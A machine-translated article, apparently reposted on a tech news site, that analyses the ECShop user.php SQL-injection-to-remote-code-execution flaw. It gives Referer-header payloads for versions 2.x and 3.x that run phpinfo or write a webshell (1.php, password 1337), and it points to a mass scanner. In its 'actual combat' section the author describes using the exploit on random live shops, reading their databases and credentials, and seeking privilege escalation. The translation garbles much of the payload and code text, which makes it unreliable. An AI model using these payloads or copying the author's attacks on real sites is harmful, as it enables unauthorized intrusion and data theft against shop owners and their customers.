In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
It is believed that many inexperienced people do not know what to do about how to analyze the high-risk vulnerabilities and enhance the rights of remote code execution in the full series of versions of ECShop. Therefore, this paper summarizes the causes and solutions of the problems. Through this article, I hope you can solve this problem.
Overview of vulnerabilities
The template variable of the display function in the user.php file of ECShop is controllable, resulting in injection, and remote code execution can be achieved with injection. Attackers do not need to log on to the site and other operations, can directly write to the webshell remotely, the harm is serious.
Vulnerability rating
Serious
Scope of influence
The full series version of ECShop, including 2.xmeme3.0.xmeme3.6.x and so on.
Vulnerability analysis 0x01. SQL injection
Take a look at ecshop/user.php:302 first.
The $back_act variable comes from HTTP_REFERER and is controllable.
Ecshop uses the php template engine smarty, which has two basic functions, assign () and display (). The assign () function is used to assign values to the template variables when the template is executed, and the display () function is used to display the template. When smarty runs, it reads the template file, replaces the placeholder in the template file with the parameter values passed by the assign () function, and outputs a compiled php file to be run by the server.
A Smarty object cls_template is created in the ecshop/includes/init.php:169 file to process the template file, and the corresponding file is includes/cla_template.php, as shown below:
Let's take a look at the assign function: ecshop/includes/cls_template.php:70
The assign function is used to assign values in template variables.
Display function: ecshop/includes/cls_template.php:100
From the point of view of the function, $this- > fetch is called first to process the user_passport.dwt template file, and $this- > make_compiled is called in the fetch () function to compile the template. Make_compiled will parse the variables in the template, that is, pass in the variable $back_act registered in the above assign at this time, and return to the display function after parsing the variables. At this point, $out is the html content after parsing the variable, and determine whether $this- > _ echash is in $out. If so, use $this- > _ echash to split the content, get $k and give it to insert_mod for processing.
User_passport.dwt template file content:
Let's take a look at what _ echash is, line 28 of this file:
Because _ echash is fixed, it is not randomly generated. (the _ echash value of version 2.7is 554fcae493e564ee0dc75bdf2ebf94ca and the value of _ echash of version 3.x is 45ea207d7a2b68c49582d2d22adf953.) so the content of $val is controllable!
Follow up the insert_mod () function, line 1150 of this file:
$val is passed in, first split with | to get $para and $fun, $para for anti-sequence operation, insert_ and $fun splicing, and finally dynamically call $fun ($para). The function name is partially controllable and the parameters are completely controllable. The next step is to find the available functions that start with insert_. There is an insert_ads function in ecshop/includes/lib_insert.php that fits the requirement.
Finally, let's look at the insert_ads () function in the dynamic content function library: ecshop/includes/lib_insert.php:136.
Payload:
Referer: 554fcae493e564ee0dc75bdf2ebf94caads | Referer 2: {Referer 3: "num"; Slav 72: "0Magne1 procedure analyse (extractvalue (rand (), concat (0x7e pensionversion ()), 1)--"; SRAV 2: "id"; iV1;}
Its database query statement is:
SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND () AS rnd FROM `ecsshop2`.`ecs _ ad`AS a LEFT JOIN `ecsshop2`.`ecs _ ad_ position`AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time = '1537322291' AND a.position_id =' 1' ORDER BY rnd LIMIT 0 procedure analyse (extractvalue (rand (), concat (0x7e) Version ()), 1)-0x02. Remote code execution
Next, the program calls the fetch () function of the template class: ecshop/includes/lib_insert.php:215
When display is called in user.php, and then fetch is called, the argument passed in is user_passport.dwt, and here the argument passed is $position_style. Tracing up to the source, it is found that it is the assignment of $row ['position_style']: ecshop/includes/lib_insert.php:176
While position_style is the result of SQL statement query, the above SQL injection loophole, the result of SQL query is controllable, that is, $position_style is controllable. To $position_style = $row ['position_style']; another condition is that $row [' position_id'] equals $arr ['id'].
And when constructing SQL injection, the ORDER BY rnd LIMIT 1 part of the SQL operation cannot be truncated, so you need to construct comments at id to cooperate with num for union query.
Then id is introduced into'/ *, num is introduced into * / union select 1, 0x272f2a, 3, 4, 5, 6, 7, 8, 9, 10-- these two problems can be bypassed.
The database query statements are: SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND () AS rnd FROMecsshop.ecs_adAS a LEFT JOINecsshop.ecs_ad_positionAS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time = '1535678679' AND a.position_id =' / * 'ORDER BY rnd LIMIT * / union select 1pj0x272f2a3co4 5, 5, 6, 7, 8, 9, 10, 10, 5, 10, 10, 10, 10, 10, 10, 10, 5, 5, 5, 5, 6, 7, 8, 9, 10, 10, 10.
Then $position_style splices' str:' into the fetch function.
Trace fetch () function: ecshop/includes/cls_template.php:135
Because the 'str:' is concatenated before, strncmp ($filename,'str:', 4) = = 0 is true, and then the dangerous function $this- > _ eval is called, which is the point where the vulnerability is eventually triggered. But the parameter is processed by the fetch_str method before it is passed, follow up: ecshop/includes/cls_template.php:281
The first regular matches some keywords followed by a blank, depending on the final return of the regular:
Return preg_replace ("/ {([^\}\ {\ n] *)} / e", "\ $this- > select ('\\ 1');", $source)
This rule hands over the value of $source to the $this- > select () function for processing. For example, the value of $source is xxx {$abc} xxx, and the group 1 captured by the rule is $abc, and then $this- > select ("$abc") is called.
Follow up the select () function: line 368 of this file
When the first character of the passed-in variable is $, the string containing the variable by the php tag is returned and finally executed in the _ eval () dangerous function. Before returning, we also called $this- > get_var processing to follow up get_var: line 548 of this file
When the passed variable does not have. $, call $this- > make_var to follow up make_var (): line 671 of this file
Here, combined with the statements in the select function, to execute the code successfully, $val must close [', so the payload construct, construct from the bottom up. $val is abc']; echo phpinfo (); / /; the condition for entering get_var from the select function is that the first character is $, so payload becomes $abc']; echo phpinfo (); / / To enter select, you need to be captured, and payload becomes {$abc']; echo phpinfo (); / /}. Here, because payload is phpinfo (), it will be matched by the first regular of the fetch_str function, so it needs to be transformed, so payload becomes {$abc']; echo phpinfo/**/ (); / /}. So far, the php malicious code has been constructed.
Combined with the previous SQL injection vulnerability, the final payload for executing malicious code is:
Referer: 554fcae493e564ee0dc75bdf2ebf94caads | Referer 2: {Slav 3: "num"; Slav 110: "* / SJV 1Magic 0x27202f2aMagic 3, 4, 5f2a, 3b6563686f207068696e666f2f2a2a2f28293b2f2f7d, 0x7b24616263275d3b6563686f2070696e666f2f2a2a2f28293b2f2f7d, 0x7b24616263275d3b6563686f2070696e666f2f2a2a2f28293b2f2f7d."; union select 2: "id"; SJV 4: "'/ *";} 554fcae493e564ee0dc75bdf2ebf94ca0x03. ECShop3.x
Let's talk a little bit about version 3.x.
In the ECShop3.x version, an includes/safety.php file has been added to eliminate harmful data, and its regularities match statements such as set, concat, information_schema, select from, and so on. There are no SQL statements that can be bypassed yet, but command execution can be bypassed. Because our previous payload is encoded, it bypasses regular matching. Now the only match is the union select statement. We can use both $arr ['id'] and $arr [' num'] to pass union and select separately to bypass regular detection.
Loophole recurrence
This time the reproduction is ECShop_V2.7.3, packaging source code ECShop_V2.7.3_UTF8_release1106.rar (extraction code: 2yk1). Ecshop2.7.3 is an old online store system developed under the php5.2 environment, and now many server environments have been upgraded to PHP5.3 or php5.4 or even better, so there are bound to be a lot of compatibility problems when running in the server environment above php5.3. Two articles are recommended: 1 and 2.
Phpinfo ():
Webshell:
For those who do not want to build the local environment, two online vulnerability environments are recommended, but in order to understand its principle and learning more deeply, it is recommended to build debugging and analysis locally.
Online environment vulnspy
Online environment vulhub
EXP with a small script 2.x
Phpinfo ():
Referer: 554fcae493e564ee0dc75bdf2ebf94caads | Referer 2: {Slav 3: "num"; Slav 110: "* / union select 1Magic 0x27202f2aMagic 3, 4, 5, 275d3b6563686f2070686f207068696e666f2f2a2a2f28293b2f2f7d, 0x7b24616263275d3b6563686f2070696e666f2f2a2a2f28293b2f2f7d, 0x7b24616263275d3b6563686f2070696e666f2f2a2a2f28293b2f2f7d
Webshell:
Referer: 554fcae493e564ee0dc75bdf2ebf94caads | Referer 2: {Slav 3: "num"; Slav 280: "* / union select 1Magic 0x272f2aReporter 34B24617364275d3b6173757274286261736345f6465636f6465285a6d6c735a56397764585266592397564475664484d7a4575634768774a796e504477614841675755a585686243676b58314553152624d544da4130704f794f69704293b2f7f7787777q10 -" sma2: "sma2" id; "/ *}";
1.php will be generated in the root directory of the website with a password of 1337
3.x
Phpinfo ():
Referer: 45ea207d7a2b68c49582d2d22adf953aads | Referer 2: {Slav 3: "num"; Slav 107: "* / Slav 1Magne0x2d312720554e494f4e2f2a2pia 5pia 6pia 7Meng 8Meng 0x7b24617364275d3b7068696e66928293b2f2f7d7878 7878 10MAE--" id "; SJ11:"-1' UNION/* ";} 45ea207d7a2b68c49582d2d22adf953a
Webshell:
Referer: 45ea207d7a2b68c49582d2d22adf953aads | Referer 2: {Slav 3: "num"; SJV 289: "* / SELECT 1Magic 0x2d312720554e494f4e2f2a2a2jue 5pome 5pome 6pje 7pia 7pyrus 0x7b24617364275d3b61737362742862636345f6465636f6465285a6d6c735a563977645266592397567567564484d6f4a45756347684a79776e504439778416755685a62436b583145531524d544d7a41304704f412f632929b2f2f7788710;"-"id:" UNION/* '111 ";
1.php will be generated in the root directory of the website with a password of 1337
Small script
Here is a serialized php script (the ninth location is what you want):
Batch scan detection tool
A scanner developed in C # specializes in scanning EcShop < 4. 0 remote code execution vulnerabilities. 10, 000 websites can be completed in about 30 seconds.
EcShop_RCE_Scanner
Vulnerability repair
We are currently analyzing and downloading the latest version of ECShop 4.0to fix this vulnerability:
See ecshop4/ecshop/includes/lib_insert.php
As you can see, the passed $arr [id] and $arr [num] are forcibly converted to integers so that this vulnerability cannot be exploited.
In addition, we note that there is no official release of independent patches for older versions (2.x and 3.x). Users of older versions can refer to ECShop 4.0 code to fix or upgrade directly to ECShop 4.0.
Actual combat and promotion of power
Randomly found a station of 2.7.3 and 3.0.0. You can getshell directly with exp, just like the one built locally.
Recently, I heard from the teacher that the highest state of safety is actually social engineering. I saw the encrypted password when I entered the database. After knowing the encryption method, I still couldn't figure out the background password for a long time. My roommate spent a few minutes guessing the password on the spot. So, the best thing is that you can guess the password in one mouthful, so you don't have to do so many fancy things.
There is a new station:
There are old stations:
The new station burst the loophole as soon as it was built, and the old station is still updating the content, which is a little interesting.
Directly write very important things in a slightly hidden place, or I turned to, such as Aliyun account password, database account password.
And almost all his passwords are weak passwords, which is really thought-provoking.
On the promotion of rights
Haha, I haven't found a way yet. Xiaobai just began to learn to raise power, saying that in fact, he wanted to have a boss to give advice, and then update this part after raising power.
Cannot execute command, has read and write access.
After reading the above, have you mastered how to analyze the high-risk vulnerabilities and enhance the rights of remote code execution in the full series of ECShop versions? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.